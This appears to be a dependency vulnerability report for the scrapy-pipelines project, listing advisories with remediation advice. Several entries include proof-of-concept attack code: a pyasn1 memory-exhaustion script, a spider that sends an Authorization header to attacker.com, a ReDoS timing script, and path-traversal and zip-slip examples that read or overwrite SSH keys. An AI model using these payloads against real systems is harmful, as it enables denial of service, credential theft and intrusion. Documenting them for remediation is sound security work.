Find, fix and prevent vulnerabilities in your code.
critical severity
new
- Vulnerable module: pyopenssl
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › pyopenssl@25.3.0Remediation: Upgrade to scrapy@2.4.1.
Overview
Affected versions of this package are vulnerable to Buffer Overflow via the set_cookie_generate_callback function. An attacker can cause a buffer overflow by providing a callback that returns a cookie value greater than 256 bytes.
Note:
This is only exploitable if the application explicitly uses the set_cookie_generate_callback method on an OpenSSL Context object.
Remediation
Upgrade pyopenssl to version 26.0.0 or higher.
References
high severity
- Vulnerable module: pyasn1
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › service-identity@21.1.0 › pyasn1@0.5.1
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › service-identity@21.1.0 › pyasn1-modules@0.3.0 › pyasn1@0.5.1
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the valueDecoder function in decoder.py. An attacker can cause memory exhaustion by submitting a malformed RELATIVE-OID containing excessive continuation octets.
PoC
import pyasn1.codec.ber.decoder as decoder
import pyasn1.type.univ as univ
import sys
import resource
# Deliberately set memory limit to display PoC
try:
resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))
print("[*] Memory limit set to 100MB")
except:
print("[-] Could not set memory limit")
# Test with different payload sizes to find the DoS threshold
payload_size_mb = int(sys.argv[1])
print(f"[*] Testing with {payload_size_mb}MB payload...")
payload_size = payload_size_mb * 1024 * 1024
# Create payload with continuation octets
# Each 0x81 byte indicates continuation, causing bit shifting in decoder
payload = b'\x81' * payload_size + b'\x00'
length = len(payload)
# DER length encoding (supports up to 4GB)
if length < 128:
length_bytes = bytes([length])
elif length < 256:
length_bytes = b'\x81' + length.to_bytes(1, 'big')
elif length < 256**2:
length_bytes = b'\x82' + length.to_bytes(2, 'big')
elif length < 256**3:
length_bytes = b'\x83' + length.to_bytes(3, 'big')
else:
# 4 bytes can handle up to 4GB
length_bytes = b'\x84' + length.to_bytes(4, 'big')
# Use OID (0x06) for more aggressive parsing
malicious_packet = b'\x06' + length_bytes + payload
print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB")
try:
print("[*] Decoding (this may take time or exhaust memory)...")
result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())
print(f'[+] Decoded successfully')
print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')
# Try to convert to string
print('[*] Converting to string...')
try:
str_result = str(result[0])
print(f'[+] String succeeded: {len(str_result)} chars')
if len(str_result) > 10000:
print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')
except MemoryError:
print(f'[-] MemoryError during string conversion!')
except Exception as e:
print(f'[-] {type(e).__name__} during string conversion')
except MemoryError:
print('[-] MemoryError: Out of memory!')
except Exception as e:
print(f'[-] Error: {type(e).__name__}: {e}')
print("\n[*] Test completed")
Remediation
Upgrade pyasn1 to version 0.6.2 or higher.
References
high severity
new
- Vulnerable module: pyasn1
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › service-identity@21.1.0 › pyasn1@0.5.1
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › service-identity@21.1.0 › pyasn1-modules@0.3.0 › pyasn1@0.5.1
Overview
Affected versions of this package are vulnerable to Uncontrolled Recursion when decoding ASN.1 data. An attacker can cause the application to crash or exhaust system memory by supplying specially crafted ASN.1 data with deeply nested SEQUENCE or SET tags using indefinite Length markers.
Remediation
Upgrade pyasn1 to version 0.6.3 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1Remediation: Upgrade to scrapy@2.14.0.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to insufficient protection against decompression brotli bombs. An attacker can cause excessive memory consumption and crash the client by sending specially crafted compressed data with extremely high compression ratios.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade Scrapy to version 2.14.0 or higher.
References
high severity
- Vulnerable module: cryptography
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › cryptography@45.0.7Remediation: Upgrade to scrapy@2.10.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › pyopenssl@25.3.0 › cryptography@45.0.7Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › service-identity@21.1.0 › cryptography@45.0.7
Overview
Affected versions of this package are vulnerable to Insufficient Verification of Data Authenticity in public key functions public_key_from_numbers, EllipticCurvePublicNumbers.public_key, load_der_public_key, and load_pem_public_key, which may reveal bits from a private key when provided with a malicious public key as input. When the application is using sect* binary curves for verification - which is a rare use case - these functions do not verify that the provided point belongs to the expected prime-order subgroup of the curve. An attacker can thus expose partial private keys or forge signatures.
Remediation
Upgrade cryptography to version 46.0.5 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1Remediation: Upgrade to scrapy@2.11.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Improper Resource Shutdown or Release due to the enforcement of response size limits only during the download of raw, usually-compressed response bodies and not during decompression. A malicious website being scraped could send a small response that, upon decompression, could exhaust the memory available to the process, potentially affecting any other process sharing that memory, and affecting disk usage in case of uncompressed response caching.
Remediation
Upgrade Scrapy to version 1.8.4, 2.11.1 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1Remediation: Upgrade to scrapy@2.6.0.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Information Exposure via responses from domain names whose public domain name suffix contains 1 or more periods are able to set cookies that are included in requests to any other domain sharing the same domain name suffix.
Remediation
Upgrade Scrapy to version 1.8.2, 2.6.0 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1Remediation: Upgrade to scrapy@2.11.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Information Exposure Through Sent Data due to the failure to remove the Authorization header when redirecting across domains. An attacker can potentially allow for account hijacking by exploiting the exposure of the Authorization header to unauthorized actors.
PoC
class QuotesSpider(scrapy.Spider):
name = "quotes"
def start_requests(self):
urls = [
'http://mysite.com/redirect.php?url=http://attacker.com:8182/xx',
]
for url in urls:
yield scrapy.Request(url=url,cookies={'currency': 'USD', 'country': 'UY'},headers={'Authorization':'Basic YWxhZGRpbjpvcGVuc2VzYW1l'},callback=self.parse)
def parse(self, response):
page = response.url.split("/")[-2]
filename = f'quotes-{page}.html'
with open(filename, 'wb') as f:
f.write(response.body)
self.log(f'Saved file {filename}')
Remediation
Upgrade Scrapy to version 2.11.1 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1Remediation: Upgrade to scrapy@2.11.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Origin Validation Error due to the improper handling of the Authorization header during cross-domain redirects. An attacker can leak sensitive information by inducing the server to redirect a request with the Authorization header to a different domain.
Workarounds
1)Make sure that the Authentication header, either directly or through some third-party plugin is not used.
2)If that header is needed in some requests, add dont_redirect: True to the request.meta dictionary of those requests to disable following redirects for them.
3)If same domain redirect support is needed on those requests, make sure you trust the target website not to redirect your requests to a different domain.
Remediation
Upgrade Scrapy to version 1.8.4, 2.11.1 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1Remediation: Upgrade to scrapy@2.11.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the XMLFeedSpider class or any subclass that uses the default node iterator iternodes, as well as direct uses of the scrapy.utils.iterators.xmliter function. An attacker can cause extreme CPU and memory usage during the parsing of its content by handling a malicious response.
Note:
For versions 2.6.0 to 2.11.0, the vulnerable function is open_in_browser for a response without a base tag.
Workaround
- For
XMLFeedSpider, switch the node iterator toxmlorhtml. - For
open_in_browser, before using the function, either manually review the response content to discard a ReDoS attack or manually define the base tag to avoid its automatic definition byopen_in_browserlater.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade Scrapy to version 1.8.4, 2.11.1 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1Remediation: Upgrade to scrapy@2.11.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when parsing content. An attacker can cause extreme CPU and memory usage by handling a malicious response.
PoC
import re
import time
import math
def convert_size(size_bytes):
if size_bytes == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
return "%s %s" % (s, size_name[i])
END_TAG_RE = re.compile(r"<\s*/([^\s>]+)\s*>", re.S)
len_lists = [10000, 20000, 50000, 100000, 500000, 1000000]
for n in len_lists:
st = time.time()
header_end = '</'*n
re.findall(END_TAG_RE, header_end)
et = time.time()
elapsed_time = et - st
print(f'Execution time with len = {n} ~ {convert_size(len(header_end))}:
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade Scrapy to version 2.11.1 or higher.
References
high severity
- Vulnerable module: setuptools
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › zope.interface@6.4.post2 › setuptools@40.5.0Remediation: Upgrade to scrapy@2.10.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0 › zope.interface@6.4.post2 › setuptools@40.5.0Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0 › zope.interface@6.4.post2 › setuptools@40.5.0Remediation: Upgrade to txmongo@24.0.0.
Overview
Affected versions of this package are vulnerable to Improper Control of Generation of Code ('Code Injection') through the package_index module's download functions due to the unsafe usage of os.system. An attacker can execute arbitrary commands on the system by providing malicious URLs or manipulating the URLs retrieved from package index servers.
Note
Because easy_install and package_index are deprecated, the exploitation surface is reduced, but it's conceivable through social engineering or minor compromise to a package index could grant remote access.
Remediation
Upgrade setuptools to version 70.0.0 or higher.
References
high severity
new
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1Remediation: Upgrade to scrapy@2.14.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Unsafe Reflection via the Referrer-Policy header handled by RefererMiddleware(). An attacker can execute commands by supplying a malicious import path such as sys.exit in the response header which is read by the vulnerable application.
Workaround
This vulnerability can be avoided by disabling the middleware, setting the REFERER_ENABLED setting to False, manually setting the Referer header, or setting the referrer_policy meta key on all requests.
Remediation
Upgrade Scrapy to version 2.14.2 or higher.
References
medium severity
- Vulnerable module: twisted
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0
Overview
Twisted is an event-based network programming and multi-protocol integration framework.
Affected versions of this package are vulnerable to Arbitrary Command Injection via improper input sanitization in the file upload process. An attacker can execute arbitrary commands on the target system by sending a specially crafted HTTP PUT request to upload a malicious file and subsequently triggering its execution. This can result in remote code execution and potential privilege escalation depending on the web server's permissions.
Remediation
There is no fixed version for Twisted.
References
medium severity
- Vulnerable module: twisted
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0Remediation: Upgrade to txmongo@24.0.0.
Overview
Twisted is an event-based network programming and multi-protocol integration framework.
Affected versions of this package are vulnerable to HTTP Response Smuggling. When sending multiple HTTP/1.1 requests in one TCP segment, twisted.web does not guarantee the response order. An attacker in control of an endpoint can manipulate a different user's second response to a pipelined chunked request by delaying the response to their own request. Information disclosure across sessions may also be possible for reverse proxy servers using pooled connections.
Workaround
This vulnerability can be avoided by enforcing HTTP/2, as it is only vulnerable for HTTP/1.x traffic.
Remediation
Upgrade Twisted to version 24.7.0rc1 or higher.
References
medium severity
- Vulnerable module: zipp
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › service-identity@21.1.0 › attrs@24.2.0 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to scrapy@2.10.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0 › attrs@24.2.0 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0 › attrs@24.2.0 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to txmongo@24.0.0.
Overview
Affected versions of this package are vulnerable to Infinite loop where an attacker can cause the application to stop responding by initiating a loop through functions affecting the Path module, such as joinpath, the overloaded division operator, and iterdir.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade zipp to version 3.19.1 or higher.
References
medium severity
- Vulnerable module: setuptools
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › zope.interface@6.4.post2 › setuptools@40.5.0Remediation: Upgrade to scrapy@2.10.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0 › zope.interface@6.4.post2 › setuptools@40.5.0Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0 › zope.interface@6.4.post2 › setuptools@40.5.0Remediation: Upgrade to txmongo@24.0.0.
Overview
Affected versions of this package are vulnerable to Directory Traversal through the PackageIndex._download_url method. Due to insufficient sanitization of special characters, an attacker can write files to arbitrary locations on the filesystem with the permissions of the process running the Python code. In certain scenarios, an attacker could potentially escalate to remote code execution by leveraging malicious URLs present in a package index.
PoC
python poc.py
# Payload file: http://localhost:8000/%2fhome%2fuser%2f.ssh%2fauthorized_keys
# Written to: /home/user/.ssh/authorized_keys
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.
Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e is the URL encoded version of . (dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as
Zip-Slip.
One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:
2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
Upgrade setuptools to version 78.1.1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1Remediation: Upgrade to scrapy@2.11.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Files or Directories Accessible to External Parties via the DOWNLOAD_HANDLERS setting. An attacker can redirect traffic to unintended protocols such as file:// or s3://, potentially accessing sensitive data or credentials by manipulating the start URLs of a spider and observing the output.
Notes:
HTTP redirects should only work between URLs that use the
http://orhttps://schemes.A malicious actor, given write access to the start requests of a spider and read access to the spider output, could exploit this vulnerability to:
a) Redirect to any local file using the file:// scheme to read its contents.
b) Redirect to an ftp:// URL of a malicious FTP server to obtain the FTP username and password configured in the spider or project.
c) Redirect to any s3:// URL to read its content using the S3 credentials configured in the spider or project.
A spider that always outputs the entire contents of a response would be completely vulnerable.
A spider that extracted only fragments from the response could significantly limit vulnerable data.
Remediation
Upgrade Scrapy to version 2.11.2 or higher.
References
medium severity
new
- Vulnerable module: cryptography
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › cryptography@45.0.7Remediation: Upgrade to scrapy@2.10.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › pyopenssl@25.3.0 › cryptography@45.0.7Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › service-identity@21.1.0 › cryptography@45.0.7
Overview
Affected versions of this package are vulnerable to Improper Certificate Validation through the NameChain DNS verification logic in src/rust/cryptography-x509-verification. An attacker can make a peer name, such as bar.example.com, validate against a wildcard leaf certificate like *.example.com even when an issuing certificate in the chain excludes that DNS subtree, causing improper certificate acceptance.
Notes
- The flaw affects X.509 path validation when DNS name constraints are present, and the leaf certificate uses a wildcard DNS SAN.
- The maintainers note that ordinary X.509 topologies, including those used by the Web PKI, are not affected, and exploitation requires an uncommon certificate hierarchy.
Remediation
Upgrade cryptography to version 46.0.6 or higher.
References
medium severity
new
- Vulnerable module: pyopenssl
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › pyopenssl@25.3.0Remediation: Upgrade to scrapy@2.4.1.
Overview
Affected versions of this package are vulnerable to Not Failing Securely ('Failing Open') via the set_tlsext_servername_callback function. An attacker can bypass security-sensitive checks by causing an unhandled exception in the callback, which results in the connection being accepted. If a user was relying on this callback for any security-sensitive behavior, this could allow bypassing it.
Remediation
Upgrade pyopenssl to version 26.0.0 or higher.
References
medium severity
- Vulnerable module: dnspython
- Introduced through: txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › pymongo@4.7.3 › dnspython@2.3.0Remediation: Upgrade to txmongo@24.0.0.
Overview
Affected versions of this package are vulnerable to Incorrect Behavior Order in the DNS pre-processing pipeline, which allows an off-path attacker who can spoof the source IP address of a malformed DNS response packet to cause denial of service. The UDP processing functions in query.py and asyncquery.py accept the first-arriving packet before closing the receiving socket, allowing the attacker to make the remote nameserver appear unavailable for the target resolver and clients.
Remediation
Upgrade dnspython to version 2.6.1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
